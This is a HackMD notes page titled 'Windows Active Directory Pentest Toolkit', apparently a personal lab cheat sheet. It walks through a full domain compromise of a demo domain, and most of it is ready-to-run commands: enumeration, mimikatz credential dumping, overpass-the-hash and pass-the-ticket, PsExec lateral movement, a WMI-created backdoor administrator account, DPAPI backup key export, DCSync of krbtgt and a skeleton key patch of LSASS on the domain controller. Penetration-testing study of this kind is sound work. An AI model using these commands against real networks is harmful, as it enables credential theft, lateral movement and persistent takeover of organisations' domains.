Try   HackMD

Windows Active Directory Pentest Toolkit

tags: cyber security windows active directory pentest nslookup

DNS stuff

DNS transfers









# view the address of the dns server
nslookup

# view the fully qualified name of the returned server
server <ip>  e.g server 10.0.20.4.azure

# attempt a zone transfer
ls -d <domain> e.g ls -d contoso.azure

DNS Enumeration















# list all users in domain
net user /domain

# list details of a user e.g ace
net user ace /domain

# enumerate all groups in the domain
net group /domain

# enumerate only the domain admins group
net group "Domain Admins" /domain

# enumerate enterprise admins
net group "Enterprise Admins" /domain

SMB stuff

SMB session enumeration

  • AD's Sysvol folder is one of the most important network shares in the environment.
  • Every computer and user must be able to access this particular network share to pull down group policies.
  • An attacker can get a goldmine of information from enumerating who has active sessions with the sysvol folder.

A good recon goal would be to conduct smb session enumeration against a domain controller to learn who has sessions with the SMB share and from what IP.

You can use JoeWare's NetSess tool for this from an admin lvl cmd prompt.




#start the NetSess tool
NetSess
NetSess.exe <domain controller> e.g NetSess.exe ContosoDC

Mimikatz

Harvesting credentials

This ideally can harvest credentials from user memory







# open an elevated cmd prompt and navigate to where mimikatz is

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> credentials.txt

# check details for the user of interest e.g ace
net user ace /domain

Overpass the hash

A harvested NTLM hash, like one we would get from the process above, can be used to obtain a TGT which allows us to masquerade as that user.

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:ace /ntlm:paste ntlm hash here /domain:contoso.azure" "exit"

A new command prompt opens executing as the compromised user.

Power [to the] shell

With the new command prompt obtained let's powershell











# start powershell
powershell

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

# use a powersploit command
Import-Module C:\tools\PowerSploit\PowerSploit-Master\PowerSploit.psm1 -Force

#identify the local admins for the ip we discovered earlier that was exposed to a domain admin account, for our demo let's use 10.0.20.4
Get-NetLocalGroup 10.0.20.4

If we have the right set of credentials we can laterally move to the admin pc based on the info we have at this point








# Access adminpc
dir \\adminpc\c$

# see what tickets are available
klist

# look for the TGT in the results

By this point, the attack should have given us validated admin privileges thus we are set to move laterally to admin pc and harvest more credentials.



















# stage mimikatz on the adminpc
cd C:\tools\mimikatz\x64

xcopy mimikatz.exe \\adminpc\c$\temp

# use a psexec command to remotely execute mimikatz

# execute and export the tickets found in the LSASS.exe process and place them in the current directory on adminpc
PsExec.exe \\AdminPc -accepteula cmd /c  (cd c:\temp ^& mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit")

# copy the tickets from the AdminPc to the victimpc, in this case we are only interested in luffy's ticket since he has access to the DC 
xcopy \\adminpc\c$\temp\*LuffyM* c:\temp\adminpc_tickets

# in the prompt that pops up select Directory
D

# clean up
rmdir \\adminpc\c$\temp /s /q

We can finally become Luffy by passing the ticket






# import Luffy's tickets
mimikatz.exe "privilege::debug" "kerberos::ptt c:\temp\adminpc_tickets" "exit"

# list available tickets to confirm we are now luffy
klist

As the attacker we have successfully passed the ticket at this point.
We harvested Luffy's credential from AdminPc and then passed it to another process running on VictimPc.
However, these tickets remain unused.

finish the attack



# Access the DC from victimpc
dir \\ContosoDC\c$

Establishing Domain Dominance

Ensuring persistence on a domain to act as an insurance policy incase initial compromise and ensuing actions are discovered.
An example is using WMI (windows management instrumentation) to create a process locally on the DC that creates a new user and password.












# use wmic to create a process to add sabo as a user
wmic /node:ContosoDC process call create "net user /add Sabo p@ssw0rd1"

# use remote powershell to add sabo to the administrators group on the DC
powershell

$s = New-PSSession -ComputerName ContosoDC

Invoke-Command -Session $s -ScriptBlock {add-ADGroupMember -Identity "Administrators" -Members Sabo}

exit

Windows uses the Data protection API (DPAPI) to securely protect passwords saved by browsers, encrypted files, and other sensitive data
Domain controllers hold a master key that can decrypt all secrets on domain-joined windows machines.

We can use mimikatz to export the master key from the DC






# export master key
mimikatz.exe "privilege::debug" "lsadump::backupkeys /system:ContosoDC.contoso.azure /export" "exit"

#confirm key has been exported
dir

With this key we can decrypt any DPAPI encrypted file or sensitive data from any machine in the entire forest.

Malicious Replication

  • Is a method that allows an attacker to replicate user information using Domain Admin or equivalent credentials.
  • It allows for the remote harvesting of credentials.
  • The most critical account to attempt to harvest is krbtgt as it is the master key used to sign all kerberos tickets.

The two common hacking tools for this are:

  • mimikatz
  • impacket by core security

mimikatz for malicious replication




# replicate the krbtgt account info to a plain text file

mimikatz.exe "lsadump::dcsync /domain:contoso.azure /user:krbtgt" "exit" >> c:\temp\exportedkeys.txt

Skeleton Key Attacks

  • In this attack, users can still sign in with their normal password but each of their accounts is also given a master password.
  • The new master password / skeleton key gives anyone who knows it the ability to masquerade as any user at any time.
  • This attack is achieved by patching the LSASS.exe process on the DC, forcing users to authenticate via a downgraded encryption type.





# copy mimikatz to the DC
xcopy mimikatz.exe \\ContosoDC\c$\temp

# remotely execute mimikatz via psexec
PsExec.exe \\ContosoDC -accepteula cmd /c (cd c:\temp ^& mimikatz.exe "privilege::debug" "misc::skeleton" ^& "exit")

This patches the LSASS process on the domain controller.

At this point we can run whatever we want as whichever user we want using the skeleton key





# run calculator as ace
runas /user:ace@contoso.azure "calculator"

# provide the master password mimikatz

Skeleton key can be used for any account including service accounts and computer accounts.

Last changed by 
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
1
355

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Active - HTB Series

image

Aug 10, 2024
Read more from codeAssassin
Published on HackMD